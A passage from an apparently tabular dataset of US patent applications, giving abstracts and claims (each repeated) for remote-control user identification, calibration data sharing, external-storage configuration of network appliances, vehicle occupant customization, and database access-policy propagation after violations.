load at least one of programming recommendations for the user, a list of favorite channels specified by the user, parental control information associated with the user, purchase information associated with the user, and remote control codes. 10. The entertainment system of claim 8 wherein the control logic is further operable to turn on components of the remote control based on the detected acceleration noise pattern of the remote control and is further operable to turn off the components of the remote control based on the detected acceleration noise pattern indicating that the remote control has been set down. 11. The entertainment system of claim 8 wherein the remote control further comprises an accelerometer and a gyroscope, and wherein the control logic of the remote control is further operable to detect acceleration with the accelerometer and the gyroscope. 12. The entertainment system of claim 8 wherein the control logic of the remote control is further operable to compare the user acceleration with the detected acceleration noise pattern when the user is picking up the remote control. 13. An entertainment device comprising:
an accelerometer; and control logic operable to:
detect an acceleration noise pattern of the entertainment device using the accelerometer while the remote control is at rest in a hand of a user of the remote control;
compare the detected acceleration noise pattern with user acceleration that is associated with a user of the entertainment device, wherein the control logic is further operable to compare time domain data of the detected acceleration noise pattern with time domain data of the user acceleration;
identify the user of the entertainment device based on the comparison of the detected acceleration noise pattern and the user acceleration; and
operate the entertainment device based on the identified user of the entertainment device. 14. The entertainment device of claim 13 further comprising an indicator light, and wherein the control logic is further operable to turn on components of the entertainment device based on the acceleration of the entertainment device, and where the control logic is further operable to turn off the components of the entertainment device based on acceleration indicating that the entertainment device has been set down. 15. The entertainment device of claim 13 further comprising a gyroscope, and wherein the control logic is further operable to detect acceleration with the accelerometer and the gyroscope. 16. The entertainment device of claim 13 wherein the control logic is further operable to compare the user acceleration noise pattern with the detected acceleration when the user is picking up the entertainment device. | 2,400 |
9,117 | 9,117 | 16,066,413 | 2,442 | Example implementations relate to calibration data transmissions. For example, a computing device includes a storage device to store calibration data of an electronic device coupled to the computing device. The computing device also includes a network interface to establish a network connection with a second computing device. The computing device further includes a processor to automatically transmit, via the network connection, the calibration data to the second computing device based on a location of the second computing device relative to the computing device and based on an association with second computing device via a communication session. | 1. A computing device comprising:
a storage device to store calibration data of an electronic device coupled to the computing device; a network interface to establish a network connection with a second computing device; and a processor to:
automatically transmit, via the network connection, the calibration data to the second computing device based on a location of the second computing device relative to the computing device and based on an association with second computing device via a communication session. 2. The computing device of claim 1, wherein the communication session includes a virtual meeting or wireless screen-sharing session. 3. The computing device of claim 1, wherein in response to detecting that the second computing device is at the same physical location as the computing device and in response to detecting that the second computing device is communicating with the computing device via the communication session, transmit the calibration data to the second computing device. 4. The computing device of claim 1, wherein the electronic device display device or a digital writing device. 5. The computing device of claim 1, wherein the storage device is to store pairing information associated with a second electronic device, and wherein the processor is to transmit the pairing information to the second computing device based on the location of the second computing device relative to the computing device and based on the association with second computing device via the communication session. 6. A computing device comprising:
a storage device to store calibration data of a first electronic device coupled to the computing device; a network interface to establish a network connection with a second computing device; and a processor to:
automatically transmit, via the network connection, the calibration data to the second computing device in response to a determination that a location of the second computing device satisfies a location threshold and in response to a determination that the computing device and the second computing device are associated via a communication session; and
receive calibration data of a second electronic device coupled to the second computing device from the second computing device. 7. The computing device of claim 6, wherein the processor is to, receive pairing information of a third electronic device from the second computing device, and wherein the processor is to complete a pairing operation with the third electronic device using the pairing information. 8. The computing device of claim 7, wherein the processor is to remove the calibration data of the second electronic device and the pairing information in response to detecting a change to the location of the second computing device. 9. The computing device of claim 6, wherein the first electronic device is display device, and wherein the second electronic device is a digital writing device. 10. The computing device of claim 6, wherein the communication session includes a virtual meeting or wireless screen-sharing session. 11. A non-transitory computer-readable storage medium comprising ructions that when executed cause a processor of a computing device to:
establish, via a network interface of the computing device, a network connection with a second computing device; automatically transmit, via the network connection, calibration data of a first electronic device coupled to the computing device to the second computing device based on a location of the second computing device relative to the computing device and based on a communication session between the computing device and the second computing device; receive calibration data of a second electronic device from the second computing device; and in response to detecting a change to the location or the communication session, remove the calibration data of the second electronic device from the computing device. 12. The non-transitory computer-readable storage medium of claim 11, wherein the instructions when executed further cause the processor to remove the calibration data of the second electronic device in response to detecting that the second computing device is at a different location than the computing device. 13. The non-transitory-computer-readable storage medium of claim 11, wherein the instructions when executed further cause the processor to remove the calibration data of the second electronic device in response to detecting an end to the communication session. 14. The non-transitory computer-readable storage medium of claim 11, wherein the first electronic device is a display device, and wherein the second electronic device is a digital writing device. 15. The non-transitory computer-readable storage medium of claim 11, wherein the communication session includes a virtual meeting or wireless screen-sharing session. | Example implementations relate to calibration data transmissions. For example, a computing device includes a storage device to store calibration data of an electronic device coupled to the computing device. The computing device also includes a network interface to establish a network connection with a second computing device. The computing device further includes a processor to automatically transmit, via the network connection, the calibration data to the second computing device based on a location of the second computing device relative to the computing device and based on an association with second computing device via a communication session.1. A computing device comprising:
a storage device to store calibration data of an electronic device coupled to the computing device; a network interface to establish a network connection with a second computing device; and a processor to:
automatically transmit, via the network connection, the calibration data to the second computing device based on a location of the second computing device relative to the computing device and based on an association with second computing device via a communication session. 2. The computing device of claim 1, wherein the communication session includes a virtual meeting or wireless screen-sharing session. 3. The computing device of claim 1, wherein in response to detecting that the second computing device is at the same physical location as the computing device and in response to detecting that the second computing device is communicating with the computing device via the communication session, transmit the calibration data to the second computing device. 4. The computing device of claim 1, wherein the electronic device display device or a digital writing device. 5. The computing device of claim 1, wherein the storage device is to store pairing information associated with a second electronic device, and wherein the processor is to transmit the pairing information to the second computing device based on the location of the second computing device relative to the computing device and based on the association with second computing device via the communication session. 6. A computing device comprising:
a storage device to store calibration data of a first electronic device coupled to the computing device; a network interface to establish a network connection with a second computing device; and a processor to:
automatically transmit, via the network connection, the calibration data to the second computing device in response to a determination that a location of the second computing device satisfies a location threshold and in response to a determination that the computing device and the second computing device are associated via a communication session; and
receive calibration data of a second electronic device coupled to the second computing device from the second computing device. 7. The computing device of claim 6, wherein the processor is to, receive pairing information of a third electronic device from the second computing device, and wherein the processor is to complete a pairing operation with the third electronic device using the pairing information. 8. The computing device of claim 7, wherein the processor is to remove the calibration data of the second electronic device and the pairing information in response to detecting a change to the location of the second computing device. 9. The computing device of claim 6, wherein the first electronic device is display device, and wherein the second electronic device is a digital writing device. 10. The computing device of claim 6, wherein the communication session includes a virtual meeting or wireless screen-sharing session. 11. A non-transitory computer-readable storage medium comprising ructions that when executed cause a processor of a computing device to:
establish, via a network interface of the computing device, a network connection with a second computing device; automatically transmit, via the network connection, calibration data of a first electronic device coupled to the computing device to the second computing device based on a location of the second computing device relative to the computing device and based on a communication session between the computing device and the second computing device; receive calibration data of a second electronic device from the second computing device; and in response to detecting a change to the location or the communication session, remove the calibration data of the second electronic device from the computing device. 12. The non-transitory computer-readable storage medium of claim 11, wherein the instructions when executed further cause the processor to remove the calibration data of the second electronic device in response to detecting that the second computing device is at a different location than the computing device. 13. The non-transitory-computer-readable storage medium of claim 11, wherein the instructions when executed further cause the processor to remove the calibration data of the second electronic device in response to detecting an end to the communication session. 14. The non-transitory computer-readable storage medium of claim 11, wherein the first electronic device is a display device, and wherein the second electronic device is a digital writing device. 15. The non-transitory computer-readable storage medium of claim 11, wherein the communication session includes a virtual meeting or wireless screen-sharing session. | 2,400 |
9,118 | 9,118 | 13,705,601 | 2,458 | Methods and systems for temporarily configuring a network appliance in accordance with externally provided customized configuration settings are provided. According to one embodiment, a network appliance may operate in one of multiple configuration modes, including an internal configuration mode and an external configuration mode. When operating in the internal configuration mode, the network appliance loads and runs configuration settings from a memory internal to the network appliance. When operating in the external configuration mode, the network appliance loads and runs configuration settings from an external storage device coupled to an interface of the network appliance. | 1. A method comprising:
providing a network appliance with a plurality of configuration modes, including an internal configuration mode and an external configuration mode; when operating in the internal configuration mode, configuring the network appliance by loading and running configuration settings from a memory internal to the network appliance; and when operating in the external configuration mode, configuring the network appliance by loading and running configuration settings from an external storage device coupled to an interface of the network appliance. 2. The method of claim 1, further comprising responsive to detecting the external storage device has been coupled to the interface, causing the network appliance to enter into the external configuration mode. 3. The method of claim 1, further comprising while in the external configuration mode performing audit processing including logging information relating to one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 4. The method of claim 3, further comprising responsive to detecting the external storage device has been decoupled from the interface:
erasing from a memory of the network appliance data collected during the audit processing; and causing the network appliance to enter into the internal configuration mode. 5. The method of claim 1, further comprising responsive to detecting the external storage device is not coupled to the interface, causing the network appliance to enter into the internal configuration mode. 6. The method of claim 3, wherein the configuration settings loaded from the external storage device are configured to facilitate auditing of one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 7. The method of claim 6, wherein the configuration settings comprise one or more valid traffic classes, a normal burst size, Weighted Fair Queuuing (WFQ) bandwidth usage, a standby routing protocol, a router ID for Open Shortest Path First (OSPF) routing protocol, route reflector setup settings, Boader Gateway Protocol (BGP) neighbor reachability information, a BGP synchronization setting, one or more multiprotocol label switching (MPLS) parameters, a log level, a community-string and an object qualifier. 8. A method comprising:
detecting an external storage device coupled to an interface of a network appliance, wherein the network appliance is running in accordance with an original operating state as dictated by internal configuration settings stored in an internal memory of the network appliance; responsive to the detecting:
loading customized configuration settings stored in the external storage device;
configuring the network applicance in accordance with the customized confuguration settings; and
performing a predetermined function based on the customized confuguration settings. 9. The method of claim 8, further comprising responsive to detecting decoupling of the external storage device from the interface:
restoring the network appliance to the original operating state; and erasing from a memory of the network appliance data collected during the predetermined auditing function. 10. The method of claim 8, wherein the internal configuration settings comprises parameters configured to facilitate operation of the network appliance within an environment in which the network appliance is installed. 11. The method of claim 8, wherein the customized configuration settings comprise parameters configured to facilitate auditing of one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 12. The method of claim 11, wherein the parameters comprise one or more valid traffic classes, a normal burst size, Weighted Fair Queuuing (WFQ) bandwidth usage, a standby routing protocol, a router ID for Open Shortest Path First (OSPF) routing protocol, route reflector setup settings, Boader Gateway Protocol (BGP) neighbor reachability information, a BGP synchronization setting, one or more multiprotocol label switching (MPLS) parameters, a log level, a community-string and an object qualifier. 13. The method of claim 8, wherein the network appliance comprises a network security system. 14. The method of claim 13, wherein the network appliance comprises a firewall or a unified threat management system. 15. The method of claim 8, further comprising, prior to configuring the network appliance in accordance with the customized configuration settings, decrypting the customized configuration settings. 16. A network appliance system comprising:
one or more processors; a communication interface device; one or more internal data storage devices operatively coupled to the one or more processors and storing:
internal configuration settings;
an external storage device detection module that, when executed by the one or more processors, indicates whether an external storage device is coupled to the communication interface device, wherein the external storage device stores customized configuration settings;
a load customized configuration settings module that, when executed by the one or more processors responsive to detecting the external storage device, loads system configuration settings from the customized configuration settings;
a load internal configuration settings module that, when executed by the one or more processors responsive to detecting an absence of the external storage device, loads system configuration settings from the internal configuration settings;
a run configuration settings module that, when executed by the one or more processors, configures the network appliance system in accordance with the loaded system configuration settings. 17. The system of claim 16, wherein the customized configuration settings comprises parameters configured to audit one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance system. 18. The system of claim 16, wherein the customized configuration settings are encrypted. 19. The system of claim 16, wherein one or more of the internal configuration settings are used after the customized configuration settings are loaded. 20. The system of claim 16, wherein the external storage device comprises one of a Universal Serial Bus (USB) flash drive, a flash card, a Secure Digital (SD) card, and an external hard drive. 21. The system of claim 16, wherein the customized configuration settings or content related thereto are deleted from the network appliance system responsive to the external storage device being removed. 22. The system of claim 16, wherein the network appliance system comprises a firewall. 23. The system of claim 16, wherein the network appliance system comprises a unified threat management system. | Methods and systems for temporarily configuring a network appliance in accordance with externally provided customized configuration settings are provided. According to one embodiment, a network appliance may operate in one of multiple configuration modes, including an internal configuration mode and an external configuration mode. When operating in the internal configuration mode, the network appliance loads and runs configuration settings from a memory internal to the network appliance. When operating in the external configuration mode, the network appliance loads and runs configuration settings from an external storage device coupled to an interface of the network appliance.1. A method comprising:
providing a network appliance with a plurality of configuration modes, including an internal configuration mode and an external configuration mode; when operating in the internal configuration mode, configuring the network appliance by loading and running configuration settings from a memory internal to the network appliance; and when operating in the external configuration mode, configuring the network appliance by loading and running configuration settings from an external storage device coupled to an interface of the network appliance. 2. The method of claim 1, further comprising responsive to detecting the external storage device has been coupled to the interface, causing the network appliance to enter into the external configuration mode. 3. The method of claim 1, further comprising while in the external configuration mode performing audit processing including logging information relating to one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 4. The method of claim 3, further comprising responsive to detecting the external storage device has been decoupled from the interface:
erasing from a memory of the network appliance data collected during the audit processing; and causing the network appliance to enter into the internal configuration mode. 5. The method of claim 1, further comprising responsive to detecting the external storage device is not coupled to the interface, causing the network appliance to enter into the internal configuration mode. 6. The method of claim 3, wherein the configuration settings loaded from the external storage device are configured to facilitate auditing of one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 7. The method of claim 6, wherein the configuration settings comprise one or more valid traffic classes, a normal burst size, Weighted Fair Queuuing (WFQ) bandwidth usage, a standby routing protocol, a router ID for Open Shortest Path First (OSPF) routing protocol, route reflector setup settings, Boader Gateway Protocol (BGP) neighbor reachability information, a BGP synchronization setting, one or more multiprotocol label switching (MPLS) parameters, a log level, a community-string and an object qualifier. 8. A method comprising:
detecting an external storage device coupled to an interface of a network appliance, wherein the network appliance is running in accordance with an original operating state as dictated by internal configuration settings stored in an internal memory of the network appliance; responsive to the detecting:
loading customized configuration settings stored in the external storage device;
configuring the network applicance in accordance with the customized confuguration settings; and
performing a predetermined function based on the customized confuguration settings. 9. The method of claim 8, further comprising responsive to detecting decoupling of the external storage device from the interface:
restoring the network appliance to the original operating state; and erasing from a memory of the network appliance data collected during the predetermined auditing function. 10. The method of claim 8, wherein the internal configuration settings comprises parameters configured to facilitate operation of the network appliance within an environment in which the network appliance is installed. 11. The method of claim 8, wherein the customized configuration settings comprise parameters configured to facilitate auditing of one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 12. The method of claim 11, wherein the parameters comprise one or more valid traffic classes, a normal burst size, Weighted Fair Queuuing (WFQ) bandwidth usage, a standby routing protocol, a router ID for Open Shortest Path First (OSPF) routing protocol, route reflector setup settings, Boader Gateway Protocol (BGP) neighbor reachability information, a BGP synchronization setting, one or more multiprotocol label switching (MPLS) parameters, a log level, a community-string and an object qualifier. 13. The method of claim 8, wherein the network appliance comprises a network security system. 14. The method of claim 13, wherein the network appliance comprises a firewall or a unified threat management system. 15. The method of claim 8, further comprising, prior to configuring the network appliance in accordance with the customized configuration settings, decrypting the customized configuration settings. 16. A network appliance system comprising:
one or more processors; a communication interface device; one or more internal data storage devices operatively coupled to the one or more processors and storing:
internal configuration settings;
an external storage device detection module that, when executed by the one or more processors, indicates whether an external storage device is coupled to the communication interface device, wherein the external storage device stores customized configuration settings;
a load customized configuration settings module that, when executed by the one or more processors responsive to detecting the external storage device, loads system configuration settings from the customized configuration settings;
a load internal configuration settings module that, when executed by the one or more processors responsive to detecting an absence of the external storage device, loads system configuration settings from the internal configuration settings;
a run configuration settings module that, when executed by the one or more processors, configures the network appliance system in accordance with the loaded system configuration settings. 17. The system of claim 16, wherein the customized configuration settings comprises parameters configured to audit one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance system. 18. The system of claim 16, wherein the customized configuration settings are encrypted. 19. The system of claim 16, wherein one or more of the internal configuration settings are used after the customized configuration settings are loaded. 20. The system of claim 16, wherein the external storage device comprises one of a Universal Serial Bus (USB) flash drive, a flash card, a Secure Digital (SD) card, and an external hard drive. 21. The system of claim 16, wherein the customized configuration settings or content related thereto are deleted from the network appliance system responsive to the external storage device being removed. 22. The system of claim 16, wherein the network appliance system comprises a firewall. 23. The system of claim 16, wherein the network appliance system comprises a unified threat management system. | 2,400 |
9,119 | 9,119 | 15,341,046 | 2,483 | A customization system for a vehicle includes a control operable to generate an output in a vehicle, with the output being a visual output, an audible output and/or a haptic output. An occupant recognition system is operable to recognize a particular occupant in the vehicle. The control accesses previously input occupant selections that are stored in a memory of the customization system. Responsive to the occupant recognition system recognizing a particular occupant of the vehicle, the control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle status or location, the control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle status or location. | 1. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising an output selected from the group consisting of a visual output, an audible output and a haptic output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; and wherein, responsive to the occupant recognition system recognizing a particular occupant in the vehicle, said control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle status, said control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle status. 2. The customization system of claim 1, wherein the recognized particular occupant is a driver of the vehicle. 3. The customization system of claim 2, wherein said occupant recognition system comprises at least one camera configured to be disposed in the vehicle so as to have a field of view that encompasses a driver's head region in the vehicle. 4. The customization system of claim 1, wherein the recognized particular occupant is a passenger of the vehicle. 5. The customization system of claim 4, wherein said occupant recognition system comprises at least one camera configured to be disposed in the vehicle so as to have a field of view that encompasses head regions of passengers in the vehicle. 6. The customization system of claim 1, wherein the previously input occupant selections include a birth date of the occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to the accessed previously input birth date corresponding to the current date, said control generates a birthday message for that particular occupant in the vehicle. 7. The customization system of claim 6, wherein the birthday message comprises playing an audible song for that particular occupant in the vehicle. 8. The customization system of claim 6, wherein the birthday message comprises playing a video for viewing by that particular occupant in the vehicle. 9. The customization system of claim 6, wherein a camera in the vehicle captures image data of that particular occupant in the vehicle when said control generates the birthday message. 10. The customization system of claim 1, wherein the previously input occupant selections include a geographical location, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to the accessed previously input geographical location corresponding to the current geographical location of the vehicle, said control generates a message for that particular occupant in the vehicle that is associated with the previously input geographical location. 11. The customization system of claim 1, wherein said control generates the output responsive to at least one of (i) the vehicle not moving, (ii) the vehicle moving below a threshold speed and (iii) the vehicle arriving at a destination. 12. The customization system of claim 1, wherein the predetermined output generated by said control comprises an output selected by that particular occupant for the current date or vehicle status. 13. The customization system of claim 1, wherein the occupant identification system recognizes a particular occupant in the vehicle responsive to an input by that particular occupant. 14. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising a visual output and an audible output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; wherein, responsive to the occupant recognition system recognizing a particular occupant in the vehicle, said control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle location, said control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle location; and wherein the predetermined output generated by said control comprises an output selected by that particular occupant and associated with the previously input occupant selection that corresponds to the current date or vehicle location. 15. The customization system of claim 14, wherein the previously input occupant selections include a date selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to the accessed previously input selected date corresponding to the current date, said control generates a selected message for that particular occupant that is associated with the previously input selected date. 16. The customization system of claim 14, wherein a camera in the vehicle captures image data of the particular occupant in the vehicle when said control generates the predetermined output. 17. The customization system of claim 14, wherein the previously input occupant selections include a geographical location selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to the accessed previously input selected geographical location corresponding to the current geographical location of the vehicle, said control generates a selected message for that particular occupant that is associated with the previously input geographical location. 18. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising an output selected from the group consisting of a visual output and an audible output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; wherein, responsive to the occupant recognition system recognizing a particular occupant of the vehicle, said control accesses previously input occupant selections associated with that particular occupant; wherein the previously input occupant selections include at least one date selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to an accessed previously input selected date corresponding to the current date, said control generates an output for that particular occupant that is associated with the previously input selected date; and wherein the previously input occupant selections include at least one geographical location selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to an accessed previously input selected geographical location corresponding to the current geographical location of the vehicle, said control generates another output for that particular occupant that is associated with the previously input geographical location. 19. The customization system of claim 18, wherein a camera in the vehicle captures image data of that particular occupant in the vehicle when said control generates the output. 20. The customization system of claim 18, wherein said control generates the output responsive to at least one of (i) the vehicle not moving, (ii) the vehicle moving below a threshold speed and (iii) the vehicle arriving at a destination. | A customization system for a vehicle includes a control operable to generate an output in a vehicle, with the output being a visual output, an audible output and/or a haptic output. An occupant recognition system is operable to recognize a particular occupant in the vehicle. The control accesses previously input occupant selections that are stored in a memory of the customization system. Responsive to the occupant recognition system recognizing a particular occupant of the vehicle, the control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle status or location, the control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle status or location.1. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising an output selected from the group consisting of a visual output, an audible output and a haptic output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; and wherein, responsive to the occupant recognition system recognizing a particular occupant in the vehicle, said control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle status, said control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle status. 2. The customization system of claim 1, wherein the recognized particular occupant is a driver of the vehicle. 3. The customization system of claim 2, wherein said occupant recognition system comprises at least one camera configured to be disposed in the vehicle so as to have a field of view that encompasses a driver's head region in the vehicle. 4. The customization system of claim 1, wherein the recognized particular occupant is a passenger of the vehicle. 5. The customization system of claim 4, wherein said occupant recognition system comprises at least one camera configured to be disposed in the vehicle so as to have a field of view that encompasses head regions of passengers in the vehicle. 6. The customization system of claim 1, wherein the previously input occupant selections include a birth date of the occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to the accessed previously input birth date corresponding to the current date, said control generates a birthday message for that particular occupant in the vehicle. 7. The customization system of claim 6, wherein the birthday message comprises playing an audible song for that particular occupant in the vehicle. 8. The customization system of claim 6, wherein the birthday message comprises playing a video for viewing by that particular occupant in the vehicle. 9. The customization system of claim 6, wherein a camera in the vehicle captures image data of that particular occupant in the vehicle when said control generates the birthday message. 10. The customization system of claim 1, wherein the previously input occupant selections include a geographical location, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to the accessed previously input geographical location corresponding to the current geographical location of the vehicle, said control generates a message for that particular occupant in the vehicle that is associated with the previously input geographical location. 11. The customization system of claim 1, wherein said control generates the output responsive to at least one of (i) the vehicle not moving, (ii) the vehicle moving below a threshold speed and (iii) the vehicle arriving at a destination. 12. The customization system of claim 1, wherein the predetermined output generated by said control comprises an output selected by that particular occupant for the current date or vehicle status. 13. The customization system of claim 1, wherein the occupant identification system recognizes a particular occupant in the vehicle responsive to an input by that particular occupant. 14. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising a visual output and an audible output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; wherein, responsive to the occupant recognition system recognizing a particular occupant in the vehicle, said control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle location, said control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle location; and wherein the predetermined output generated by said control comprises an output selected by that particular occupant and associated with the previously input occupant selection that corresponds to the current date or vehicle location. 15. The customization system of claim 14, wherein the previously input occupant selections include a date selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to the accessed previously input selected date corresponding to the current date, said control generates a selected message for that particular occupant that is associated with the previously input selected date. 16. The customization system of claim 14, wherein a camera in the vehicle captures image data of the particular occupant in the vehicle when said control generates the predetermined output. 17. The customization system of claim 14, wherein the previously input occupant selections include a geographical location selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to the accessed previously input selected geographical location corresponding to the current geographical location of the vehicle, said control generates a selected message for that particular occupant that is associated with the previously input geographical location. 18. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising an output selected from the group consisting of a visual output and an audible output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; wherein, responsive to the occupant recognition system recognizing a particular occupant of the vehicle, said control accesses previously input occupant selections associated with that particular occupant; wherein the previously input occupant selections include at least one date selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to an accessed previously input selected date corresponding to the current date, said control generates an output for that particular occupant that is associated with the previously input selected date; and wherein the previously input occupant selections include at least one geographical location selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to an accessed previously input selected geographical location corresponding to the current geographical location of the vehicle, said control generates another output for that particular occupant that is associated with the previously input geographical location. 19. The customization system of claim 18, wherein a camera in the vehicle captures image data of that particular occupant in the vehicle when said control generates the output. 20. The customization system of claim 18, wherein said control generates the output responsive to at least one of (i) the vehicle not moving, (ii) the vehicle moving below a threshold speed and (iii) the vehicle arriving at a destination. | 2,400 |
9,120 | 9,120 | 16,457,937 | 2,434 | A mechanism that dynamically creates a new access policy for a set of database servers when a policy violation has been identified in a database access response issued by any database in the set. The new access policy is then propagated in real-time and instantiated across the set of database servers so as to inoculate the other database servers and pre-empt any new compromise of information based on the intruder's actions that were found to have produced the policy violation in the first instance. Thus, the approach uses a response policy violation at one database server of a set to trigger generation of a new request access policy that is then instantiated across one or more other database servers. This response policy violation-to-request access policy instantiation occurs in substantially real-time so that the intruder cannot use a prior successful access request to obtain information from other databases using a similar strategy. | 1. A method operative in a database access control system, the database access control system being associated with a set of database servers that share an access policy, comprising:
receiving from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; analyzing the response against the access policy; upon determining that the response includes a violation of the access policy, automatically generating a new access policy; and real-time propagating the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers. 2. The method as described in claim 1 wherein analyzing the response against the access policy executes an extrusion rule. 3. The method as described in claim 2 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 4. The method as described in claim 1 further including issuing a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 5. The method as described in claim 1 wherein the new access policy includes information that identifies the client to the one or more other database servers. 6. The method as described in claim 1 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the analyzing occurs at a collector, and the generating and propagating occurs at a central manager. 7. The method as described in claim 1 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. | A mechanism that dynamically creates a new access policy for a set of database servers when a policy violation has been identified in a database access response issued by any database in the set. The new access policy is then propagated in real-time and instantiated across the set of database servers so as to inoculate the other database servers and pre-empt any new compromise of information based on the intruder's actions that were found to have produced the policy violation in the first instance. Thus, the approach uses a response policy violation at one database server of a set to trigger generation of a new request access policy that is then instantiated across one or more other database servers. This response policy violation-to-request access policy instantiation occurs in substantially real-time so that the intruder cannot use a prior successful access request to obtain information from other databases using a similar strategy.1. A method operative in a database access control system, the database access control system being associated with a set of database servers that share an access policy, comprising:
receiving from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; analyzing the response against the access policy; upon determining that the response includes a violation of the access policy, automatically generating a new access policy; and real-time propagating the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers. 2. The method as described in claim 1 wherein analyzing the response against the access policy executes an extrusion rule. 3. The method as described in claim 2 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 4. The method as described in claim 1 further including issuing a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 5. The method as described in claim 1 wherein the new access policy includes information that identifies the client to the one or more other database servers. 6. The method as described in claim 1 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the analyzing occurs at a collector, and the generating and propagating occurs at a central manager. 7. The method as described in claim 1 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. | 2,400 |
9,121 | 9,121 | 15,872,116 | 2,434 | A mechanism that dynamically creates a new access policy for a set of database servers when a policy violation has been identified in a database access response issued by any database in the set. The new access policy is then propagated in real-time and instantiated across the set of database servers so as to inoculate the other database servers and pre-empt any new compromise of information based on the intruder's actions that were found to have produced the policy violation in the first instance. Thus, the approach uses a response policy violation at one database server of a set to trigger generation of a new request access policy that is then instantiated across one or more other database servers. This response policy violation-to-request access policy instantiation occurs in substantially real-time so that the intruder cannot use a prior successful access request to obtain information from other databases using a similar strategy. | 1. A method operative in a database access control system, the database access control system being associated with a set of database servers that share an access policy, comprising:
receiving from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; analyzing the response against the access policy; upon determining that the response includes a violation of the access policy, automatically generating a new access policy; and real-time propagating the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers. 2. The method as described in claim 1 wherein analyzing the response against the access policy executes an extrusion rule. 3. The method as described in claim 2 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 4. The method as described in claim 1 further including issuing a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 5. The method as described in claim 1 wherein the new access policy includes information that identifies the client to the one or more other database servers. 6. The method as described in claim 1 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the analyzing occurs at a collector, and the generating and propagating occurs at a central manager. 7. The method as described in claim 1 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 8. An apparatus, comprising:
a processor; computer memory holding computer program instructions operative in association with a database access control system, the database access control system being associated with a set of database servers that share an access policy, the computer program instructions comprising:
program code configured to receive from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers;
program code configured to analyze the response against the access policy;
